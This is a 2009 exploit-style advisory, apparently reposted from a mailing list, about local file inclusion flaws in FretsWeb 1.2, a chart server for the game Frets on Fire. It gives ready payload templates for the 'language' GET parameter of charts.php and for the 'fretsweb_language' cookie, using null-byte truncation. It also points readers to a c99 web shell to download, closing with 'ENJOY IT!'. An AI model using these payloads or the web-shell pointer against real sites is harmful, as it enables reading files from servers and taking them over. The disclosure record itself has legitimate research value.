Security Advisory: FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  fuzzylime cms <= 3.03a Local Inclusion / Arbitrary File Corruption PoC
  FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit
  CMS Buzz (XSS/PC/HI) Multiple Remote Vulnerabilities

From: ceza_fuat_kolik_(at)_hotmail.com <ceza_fuat_kolik_(at)_hotmail.com>
Date: 22.06.2009
Subject: FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities

---------------------------------------------------------------------------------
-------------
|                           MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES                    |
|--------------------------------------------------------------------------------
------------|
|                                    |      FretsWeb 1.2      |                              |
| CMS INFORMATION:                   ------------------------                               |
| Author : xhaxkerx
| Special Thankz : yasin
| Site : http://www.c99.mobi
      |
|-->WEB: http://sourceforge.net/projects/fretsweb/                                           |
|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/                                      |
|-->DEMO: N/A                                                                                |

|-->CATEGORY: CMS / Games/Entertainment                                                      |
|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...              |
|               is an improved version of FoFCS.It is meant for...                           |
|-->RELEASED: 2009-05-30                                                                     |
|
          |
| CMS VULNERABILITY:                                                                        |
|
          |
|-->TESTED ON: firefox 3                                                                     |
|-->DORK: N/A                                                                                |

|-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI)                    |
|-->AFFECT VERSION: CURRENT (MAYBE <= ?)                                                     |
|-->Discovered Bug date: 2009-06-02                                                          |
|-->Reported Bug date: 2009-06-02                                                            |
|-->Fixed bug date: 2009-06-14                                                               |
|-->Info patch: http://sourceforge.net/projects/fretsweb/                                    |
|-->WEB/BLOG: N/A                                                                            |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)                      |
---------------------------------------------------------------------------------
-------------

Note: Of course use null byte (%00) when you want to include a file with different extension to "php"

###########################
///////////////////////////

LOCAL FILE INCLUSION (LFI):

///////////////////////////
###########################

<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>

[++] GET var --> 'language'

~~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00

###############################
///////////////////////////////

INSECURE COOKIE HANDLING (LFI):

///////////////////////////////
###############################

# if you need shell http://www.c99.mobi/c99.txt

[++] Cookie --> 'fretsweb_language'

~~~> fretsweb_language=[LFI]%00

<<<-----------------------------EOF----------------------------------
>>>ENJOY IT!

test server